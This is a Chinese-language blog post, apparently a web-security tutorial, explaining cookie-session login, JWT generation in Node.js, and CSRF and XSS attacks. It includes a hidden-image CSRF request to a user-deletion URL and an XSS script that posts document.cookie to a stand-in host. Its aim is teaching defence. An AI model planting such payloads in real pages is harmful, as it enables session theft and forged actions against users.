<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  
  <title>JWT与XSS-CSRF攻击 | 超级大馒头</title>
  <meta name="description" content="A amazing blog." />
  <meta name="keywords" content="hexo,theme,mantou,plus" />
  <meta name="HandheldFriendly" content="True" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="web服务中，用户输入用户名密码登入之后，后续访问网站的其他功能就不用再输入用户名和密码了。传统的身份校验机制为cookie-session机制： cookie-session机制 用户浏览器访问web网站，输入用户名密码 服务器校验用户名密码通过之后，生成sessonid并把sessionid和用户信息映射起来保存在服务器 服务器将生成的sessionid返回给用户浏览器，浏览器将session">
<meta property="og:type" content="article">
<meta property="og:title" content="JWT与XSS-CSRF攻击">
<meta property="og:url" content="http://example.com/2019/01/07/JWT%E4%B8%8EXSS-CSRF%E6%94%BB%E5%87%BB/index.html">
<meta property="og:site_name" content="超级大馒头">
<meta property="og:description" content="web服务中，用户输入用户名密码登入之后，后续访问网站的其他功能就不用再输入用户名和密码了。传统的身份校验机制为cookie-session机制： cookie-session机制 用户浏览器访问web网站，输入用户名密码 服务器校验用户名密码通过之后，生成sessonid并把sessionid和用户信息映射起来保存在服务器 服务器将生成的sessionid返回给用户浏览器，浏览器将session">
<meta property="og:locale">
<meta property="article:published_time" content="2019-01-06T16:00:00.000Z">
<meta property="article:modified_time" content="2023-02-11T16:14:32.000Z">
<meta property="article:author" content="weixiaojie">
<meta name="twitter:card" content="summary">
  
  
    <link rel="icon" href="/image/favicon.ico">
  

  <link rel='stylesheet' href='/css/nprogress.css'/>
  <link rel="stylesheet" href="/css/github-gist.min.css">
  <link rel="stylesheet" href="/css/font_405585_yuudmyqpo3q.css">
  <script src='/js/nprogress.min.js'></script>
  <!-- <script>try{Typekit.load({ async: false });}catch(e){}</script> -->
  
<link rel="stylesheet" href="/style.css">

  

  


<meta name="generator" content="Hexo 5.4.0"></head>

<body>
  
  <script>NProgress.start();</script>
  
  <div id="site-wrapper">
    
    <header class="header">
  <div class="header-wrapper">
    <a href="/">
      <img src="/image/logo.jpg" class="logo"/>
      <!-- <span class="site-desc">
        
      </span> -->
    </a>
    <div class="social-wrapper">
      
        
          <a href="https://github.com/weixiaojie" class="social github" target="_blank" rel="external">
            <span class="iconfont icon-github"></span>
          </a>
          
          <a href="https://weibo.com/u/2156965395" class="social weibo" target="_blank" rel="external">
            <span class="iconfont icon-weibo"></span>
          </a>
          
          <a href="mailto:18565765503@163.com" class="social email" target="_blank" rel="external">
            <span class="iconfont icon-email"></span>
          </a>
          
      
      
      <a href="#" class="social search-do" target="_blank" rel="external">
        <span class="iconfont icon-search"></span>
      </a>
            
      <!-- <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><input type="hidden" name="sitesearch" value="http://example.com"></form> -->
    </div>
    <div class="search-wrap">
      <div class="search-content animated fade-in">
        <p class="search-input">
          <span class="iconfont icon-search"></span>
          <input tabindex="1">
        </p>
        <ul class="search-result">
            
        </ul>
      </div>
    </div>
    <nav class="header-nav">
      
        <a href="/" class="archives">
          首页
        </a>
        
        <a href="/archives" class="archives">
          归档
        </a>
        
    </nav>
  </div>
</header>
    <script>NProgress.set(0.4);</script>
    
    <main id="main" role="main">
      <article id="post-JWT与XSS-CSRF攻击"
  class="post article white-box article-type-post animated fade-in-top"
  itemscope itemprop="blogPost">
  <section class="post-header article-header">
    <h2 class="title">
        <a href="/2019/01/07/JWT%E4%B8%8EXSS-CSRF%E6%94%BB%E5%87%BB/">
          JWT与XSS-CSRF攻击
        </a>
      </h2>
      <div class="subtitle">
          <time>
            2019年01月07日
          </time>
          
      </div>
  </section>
  <section class="content">
    <div class="article-entry" itemprop="articleBody">
      <p>web服务中，用户输入用户名密码登入之后，后续访问网站的其他功能就不用再输入用户名和密码了。传统的身份校验机制为<code>cookie-session</code>机制：</p>
<h3 id="cookie-session机制"><a href="#cookie-session机制" class="headerlink" title="cookie-session机制"></a>cookie-session机制</h3><ul>
<li><code>用户浏览器访问web网站，输入用户名密码</code></li>
<li><code>服务器校验用户名密码通过之后，生成sessonid并把sessionid和用户信息映射起来保存在服务器</code></li>
<li><code>服务器将生成的sessionid返回给用户浏览器，浏览器将sessionid存入cookie</code></li>
<li><code>此后用户对该网站发起的其他请求都将带上cookie中保存的sessionid</code></li>
<li><code>服务端把用户传过来的sessionid和保存在服务器的sessionid做对比，如果服务器中有该sessionid则代表身份验证成功</code></li>
</ul>
<p>这种方式存在以下几个问题：</p>
<ul>
<li>  <code>代码安全机制不完善，可能存在CSRF漏洞</code></li>
<li><code>服务端需要保存sessionid与客户端传来的sessionid做对比，当服务器为集群多机的情况下，需要复制sessionid，在多台集群机器之间共享</code></li>
<li><code>如果需要单点登入，则须将sessionid存入redis等外部存储保证每台机器每个系统都能访问到，如果外部存储服务宕机，则单点登入失效</code></li>
</ul>
<h3 id="CSRF攻击"><a href="#CSRF攻击" class="headerlink" title="CSRF攻击"></a>CSRF攻击</h3><ul>
<li><code>用户访问A网站(http://www.aaa.com)，输入用户名密码</code></li>
<li><code>服务器验证通过，生成sessionid并返回给客户端存入cookie</code></li>
<li><code>用户在没有退出或者没有关闭A网站，cookie还未过期的情况下访问恶意网站B</code></li>
<li><code>B网站返回含有如下代码的html：</code></li>
</ul>
<pre><code class="html">//假设A网站注销用户的url为：https://www.aaa.com/delete_user
&lt;img src=&quot;https://www.aaa.com/delete_user&quot; style=&quot;display:none;&quot;/&gt;
</code></pre>
<ul>
<li><code>浏览器发起对A网站的请求，并带上A网站的cookie，注销了用户</code></li>
</ul>
<h3 id="JWT认证方式"><a href="#JWT认证方式" class="headerlink" title="JWT认证方式"></a>JWT认证方式</h3><p>JWT全称 <code>Json Web Token</code>，是一个长字符串，由三部分组成：<code>Header(头部)</code>、 <code>Payload(负载)</code>、<code>Signature(签名)</code>，<code>Header.Payload.Signature</code>，用<code>.</code>分割各部分内容，看起来大概就像下面这样：</p>
<pre><code>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6InhpYW8gamllIiwiYWRtaW4iOnRydWV9.MjcxZGFjMmQzZjNlMzdjMTU0OGZmM2FlNzFjNDkyMDAwODkzZGNiYmFkODc0MTJhYTYzMTE4MmY0NDBhNzkzZA
</code></pre>
<p>生成过程如下：</p>
<pre><code>const crypto = require(&quot;crypto&quot;);
const base64UrlEncode = require(&quot;base64url&quot;);
//头部信息
var header = &#123;
    &quot;alg&quot;: &quot;HS256&quot;, //签名算法类型，默认是 HMAC SHA256（写成 HS256）
    &quot;typ&quot;: &quot;JWT&quot; //令牌类型，JWT令牌统一为JWT
&#125;;
//负载信息,存储用户信息
var payload = &#123;
    &quot;sub&quot;: &quot;1234567890&quot;,
    &quot;name&quot;: &quot;xiao jie&quot;,
    &quot;admin&quot;: true
&#125;
//服务器秘钥，用于加密生成signature,不可泄漏
var secret = &quot;chaojidamantou&quot;;
//header部分和payload部分
var message = base64UrlEncode(JSON.stringify(header)) + &quot;.&quot; + base64UrlEncode(JSON.stringify(payload));
//HMACSHA256加密算法
function HMACSHA256(message, secret) &#123;
    return crypto.createHmac(&#39;sha256&#39;, secret).update(message).digest(&quot;hex&quot;);
&#125;
//生成签名信息
var signature = HMACSHA256(message, secret);
//header和payload部分内容默认不加密,也可以使用加密算法加密
var JWT = message + &quot;.&quot; + base64UrlEncode(signature);
console.log(JWT);
</code></pre>
<p>验证过程如下：</p>
<ul>
<li><code>用户访问网站，输入账号密码登入</code></li>
<li><code>服务器校验通过，生成JWT，不保存JWT，直接返回给客户端</code></li>
<li><code>客户端将JWT存入cookie或者localStorage </code></li>
<li><code>此后用户发起的请求，都将使用js从cookie或者localStorage读取JWT放在http请求的header中，发给服务端</code></li>
<li><code>服务端获取header中的JWT，用base64URL算法解码各部分内容，并在服务端用同样的秘钥和算法生成signature，与传过来的signature对比，验证JWT是否合法</code></li>
</ul>
<p>使用JWT验证，由于服务端不保存用户信息，不用做sessonid复制，这样集群水平扩展就变得容易了。同时用户发请求给服务端时，前端使用JS将JWT放在header中手动发送给服务端，服务端验证header中的JWT字段，而非cookie信息，这样就避免了CSRF漏洞攻击。</p>
<p>不过，无论是cookie-session还是JWT，都存在被XSS攻击盗取的风险：</p>
<h3 id="XSS攻击"><a href="#XSS攻击" class="headerlink" title="XSS攻击"></a>XSS攻击</h3><p>跨站脚本攻击，其基本原理同sql注入攻击类似。页面上用来输入信息内容的输入框，被输入了可执行代码。假如某论坛网站有以下输入域用来输入帖子内容</p>
<pre><code class="html">发帖内容：&lt;textarea rows=&quot;3&quot; cols=&quot;20&quot;&gt;&lt;/textarea&gt;
</code></pre>
<p>而恶意用户在textarea发帖内容中填入诸如以下的js脚本：</p>
<pre><code class="html">今天很开心，学会了JWT
&lt;script&gt;
$.ajax(&#123;
  type: &quot;post&quot;,
  url: &quot;https://www.abc.com/getcookie&quot;,
  data: &#123;cookie : document.cookie&#125;
&#125;);
&lt;/script&gt;
</code></pre>
<p>那么当其他用户访问该帖子的时候，用户的cookie就会被发送到abc域名的服务器上了。</p>
<p>为了避免xss攻击，客户端和服务端都应该对提交数据进行xss攻击转义。</p>

    </div>
  </section>

  
  
</article>
      <script>NProgress.set(0.6);</script>
    </main>
    
    <!-- <footer class="footer">
  <div class="footer-wrap">
    <div class="footer-link">
      
      <h3>LINKS</h3>
      <p>
        
          <a href="http://1x0.xyz/" target="_blank">Tian1x0</a>
        
          <a href="http://www.royalmice.com/hankzhou/" target="_blank">Hankzhou</a>
        
          <a href="http://sjydh.me/" target="_blank">设计有点货</a>
        
          <a href="https://developers.google.com/web/fundamentals/" target="_blank">Web fundamentals</a>
        
      </p>
      
    </div>
    <div class="footer-tags">
      
    </div>
    <div class="footer-info">
        <div>Theme <span class="codename"><a href="https://github.com/GGICE/hexo-icer" target="_blank">icer</a></span> designed & coded by <a href="https://ice.gs/" target="_blank">GGICE</a></div>
        <div>Copyright &copy; 2026, <a href="/">超级大馒头</a>  . All rights reserved .</div>
      </div>
  </div>
</footer>
 -->

    <script>NProgress.set(0.8);</script>
    
  </div>

  <script src="/js/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>

<script src="/js/main.js"></script>


<!-- Commit -->



  <script>
    NProgress.done();
  </script>
  
</body>
</html>
